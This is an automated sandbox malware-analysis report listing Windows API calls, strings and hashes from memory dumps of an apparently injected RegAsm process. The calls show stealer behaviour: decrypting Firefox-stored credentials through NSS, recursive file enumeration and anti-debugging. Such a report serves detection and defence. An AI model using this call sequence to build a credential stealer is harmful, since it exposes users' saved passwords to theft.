                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040AF44
                                                                                    • FindClose.KERNEL32(00000000), ref: 0040AF53
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitwsprintf
                                                                                    • String ID: #$%s\*.*
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpystrlen
                                                                                    • String ID: (pre-xul)$data$name$schema
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D4F2
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D50B
                                                                                      • Part of subcall function 6CC3CFE0: EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC3CFF6
                                                                                      • Part of subcall function 6CC3CFE0: LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC3D026
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D52E
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC5D690
                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CC5D6A6
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC5D712
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D751
                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CC5D7EA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                    • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(000007D0), ref: 6CC94EFF
                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC94F2E
                                                                                    • moz_xmalloc.MOZGLUE ref: 6CC94F52
                                                                                    • memset.VCRUNTIME140(00000000,00000000), ref: 6CC94F62
                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC952B2
                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC952E6
                                                                                    • Sleep.KERNEL32(00000010), ref: 6CC95481
                                                                                    • free.MOZGLUE(?), ref: 6CC95498
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                    • String ID: (
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE744), ref: 6CC47885
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE744), ref: 6CC478A5
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC478AD
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC478CD
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC478D4
                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6CC478E9
                                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 6CC4795D
                                                                                    • memset.VCRUNTIME140(?,00000000,00000160), ref: 6CC479BB
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6CC47BBC
                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6CC47C82
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC47CD2
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6CC47DAF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeavememset
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 00408305
                                                                                    • lstrlenA.KERNEL32(0040860A,00000001,?,00000014,00000000,00000000,?,0040860A,00000014), ref: 0040831F
                                                                                    • CryptStringToBinaryA.CRYPT32(0040860A,00000000,?,0040860A,00000014), ref: 00408329
                                                                                    • PK11_GetInternalKeySlot.NSS3(?,0040860A,00000014), ref: 00408337
                                                                                    • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,0040860A,00000014), ref: 0040834C
                                                                                    • PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00408377
                                                                                    • memcpy.MSVCRT ref: 00408391
                                                                                    • lstrcat.KERNEL32(00425B87,00425B8B), ref: 004083B8
                                                                                    • PK11_FreeSlot.NSS3(?), ref: 004083C1
                                                                                    • lstrcat.KERNEL32(00425B87,00425B8E), ref: 004083D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 2251291257-0
                                                                                    • Opcode ID: c50b8bd6e5bf44195200b814502ab1ff21272c9ffb322e859665ff8925258165
                                                                                    • Instruction ID: 7b5aa21d4fd6a2ae8f0576019faf014b4e2967858d758fb1c118222b80198efe
                                                                                    • Opcode Fuzzy Hash: c50b8bd6e5bf44195200b814502ab1ff21272c9ffb322e859665ff8925258165
                                                                                    • Instruction Fuzzy Hash: 1E2189B590021DEFCB009FA4DD85AEE7BBCFB08744F10047AFA05F2250EB359A459BA5
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00409905
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00425BA6,00000000,75AFAC90), ref: 00409964
                                                                                    • StrCmpCA.SHLWAPI(?,00425DDC), ref: 00409981
                                                                                    • StrCmpCA.SHLWAPI(?,00425DE0), ref: 0040999B
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00409F07
                                                                                    • FindClose.KERNEL32(00000000), ref: 00409F16
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                    • String ID: "$\*.*
                                                                                    • API String ID: 1275501236-2874818444
                                                                                    • Opcode ID: ba1e41c3a08dd9c9c4b97970b2329b66f396e22d7e45ebdf869dc2bc4f58e3ba
                                                                                    • Instruction ID: 8c998fa2f9c1fd353ee5f1f27dacdcbdf329c9249c59a3b65554af7f07740ccf
                                                                                    • Opcode Fuzzy Hash: ba1e41c3a08dd9c9c4b97970b2329b66f396e22d7e45ebdf869dc2bc4f58e3ba
                                                                                    • Instruction Fuzzy Hash: 09124B71904149EACB15EBE4C956BEEBB78AF18308F5041BAE405735C2DF386B8CCB65
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32 ref: 6CC97046
                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6CC97060
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC9707E
                                                                                      • Part of subcall function 6CC481B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CC481DE
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC97096
                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC9709C
                                                                                    • LocalFree.KERNEL32(?), ref: 6CC970AA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                                    • String ID: ### ERROR: %s: %s$(null)
                                                                                    • API String ID: 2989430195-1695379354
                                                                                    • Opcode ID: 18d57eb4f3de29e0856464fe28bb92943cb975df8556b58ad2d8d51f5921caf6
                                                                                    • Instruction ID: 8124e094ee603de008e810359ef376fae09ef820a0fb28981a9df2d671c5d74c
                                                                                    • Opcode Fuzzy Hash: 18d57eb4f3de29e0856464fe28bb92943cb975df8556b58ad2d8d51f5921caf6
                                                                                    • Instruction Fuzzy Hash: 5D01B9B1A00108AFDF00ABE4DC9ADAF7BBCEF49254F010435FA05E3241E6716914CBA5
                                                                                    APIs
                                                                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CC82C31
                                                                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CC82C61
                                                                                      • Part of subcall function 6CC34DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC34E5A
                                                                                      • Part of subcall function 6CC34DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC34E97
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC82C82
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC82E2D
                                                                                      • Part of subcall function 6CC481B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CC481DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                    • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                    • API String ID: 801438305-4149320968
                                                                                    • Opcode ID: d385ce8aeefbdc44acded72305fb4ba73eb3d42deb6f7f9680d228b9c214f0c0
                                                                                    • Instruction ID: 77f7c8d2a811920f5dbfdac0801bb89fbc501b3e29dd3f1148780d1efb9f4057
                                                                                    • Opcode Fuzzy Hash: d385ce8aeefbdc44acded72305fb4ba73eb3d42deb6f7f9680d228b9c214f0c0
                                                                                    • Instruction Fuzzy Hash: ED91E0B06097408FD724CF24C4A869FBBE1AFC9358F14491EE99A87751FB30D949CB52
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldiv__aullrem
                                                                                    • String ID: -Infinity$NaN
                                                                                    • API String ID: 3839614884-2141177498
                                                                                    • Opcode ID: 88987848f3a063f64a5a10850f761dd4747f3cc86f78c739310f5c0f1aba7dd5
                                                                                    • Instruction ID: ab6bdadffe1cd4a29a4aa2c99262c168c13e6353f6d973d07d4c9d313f69a4b5
                                                                                    • Opcode Fuzzy Hash: 88987848f3a063f64a5a10850f761dd4747f3cc86f78c739310f5c0f1aba7dd5
                                                                                    • Instruction Fuzzy Hash: 3AC1A131E04319CFDB14CFA9C89079EB7B6FF88714F144529D406ABB80EB71A949CB91
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0041D65A
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D66F
                                                                                    • UnhandledExceptionFilter.KERNEL32(8d), ref: 0041D67A
                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0041D696
                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 0041D69D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                    • String ID: 8d
                                                                                    • API String ID: 2579439406-1695097073
                                                                                    • Opcode ID: 3df5f2af5f9886aae9301c61ac24f13160ce3ef7ffecb5ae9da20c7eae87b595
                                                                                    • Instruction ID: 8650a471880aef750f15a0036821a59eef43acc5f6d326e9b3af3f3796108471
                                                                                    • Opcode Fuzzy Hash: 3df5f2af5f9886aae9301c61ac24f13160ce3ef7ffecb5ae9da20c7eae87b595
                                                                                    • Instruction Fuzzy Hash: F52105BC911324EFE751DF55ED856543BA2FB0A308F50202AEB0887661D7B65581CF0E
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 00402481
                                                                                    • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                                                                    • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BinaryCryptString$memset
                                                                                    • String ID: UNK
                                                                                    • API String ID: 1505698593-448974810
                                                                                    • Opcode ID: 2b0e62d7c336e9d0ea714f5c51de4316a1c5bb92040c656a214ac858f78577a5
                                                                                    • Instruction ID: 23a34516ece63cf115ba3724b7c7f869d3e4035490e84059cdf60d193a4bb67a
                                                                                    • Opcode Fuzzy Hash: 2b0e62d7c336e9d0ea714f5c51de4316a1c5bb92040c656a214ac858f78577a5
                                                                                    • Instruction Fuzzy Hash: 4F0162F260011C7EE711EB95DE81DFB77ACEB45698F0000ABB704A3181E6F4AE845A78
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6CCA8A4B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset
                                                                                    • String ID:
                                                                                    • API String ID: 2221118986-0
                                                                                    • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                    • Instruction ID: 16dbecf4110f77ee0d11a7f09f5a8c2795f6cacc94bf472449b708c0bdb53d65
                                                                                    • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                    • Instruction Fuzzy Hash: 93B1E772E0121B8FDB14CFA8CC95B99B7B2FF85314F1442A9C549DB791E7309986CB90
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6CCA88F0
                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CCA925C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset
                                                                                    • String ID:
                                                                                    • API String ID: 2221118986-0
                                                                                    • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                    • Instruction ID: 403cc8438c9d6344da7280d9925acda44dd7f54a54e1b9944efca034669d9211
                                                                                    • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                    • Instruction Fuzzy Hash: 42B1D672E0110B8FDB14CF98CC95AADB7B2EF84314F144269C549DBB95E731A98ACB90
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCA8E18
                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CCA925C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset
                                                                                    • String ID:
                                                                                    • API String ID: 2221118986-0
                                                                                    • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                    • Instruction ID: 67aecc2a34470d7db9565864bf623d754237ad6538d1d6d206fed0fafd9e6941
                                                                                    • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                    • Instruction Fuzzy Hash: C8A1E972E001178FCB14CF98CC95B99B7B2EF85314F1442B9C949DB785E731A99ACB90
                                                                                    APIs
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC87A81
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC87A93
                                                                                      • Part of subcall function 6CC55C50: GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                                      • Part of subcall function 6CC55C50: EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC87AA1
                                                                                      • Part of subcall function 6CC55C50: __aulldiv.LIBCMT ref: 6CC55DB4
                                                                                      • Part of subcall function 6CC55C50: LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC55DED
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6CC87B31
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                    • String ID:
                                                                                    • API String ID: 4054851604-0
                                                                                    • Opcode ID: fec2ce6aca0a4b55e8746976372f91eedc43dfa23ec190df97acf15f78fd2d66
                                                                                    • Instruction ID: bd75fdb6a6f6ac53edce3555c5069d78ace88698e5a885d2caaad1225ef9fa66
                                                                                    • Opcode Fuzzy Hash: fec2ce6aca0a4b55e8746976372f91eedc43dfa23ec190df97acf15f78fd2d66
                                                                                    • Instruction Fuzzy Hash: C8B18D357093848BCB14CF64C05069FBBE2ABC531CF154A1CE99567B91FB70E90ADB82
                                                                                    APIs
                                                                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
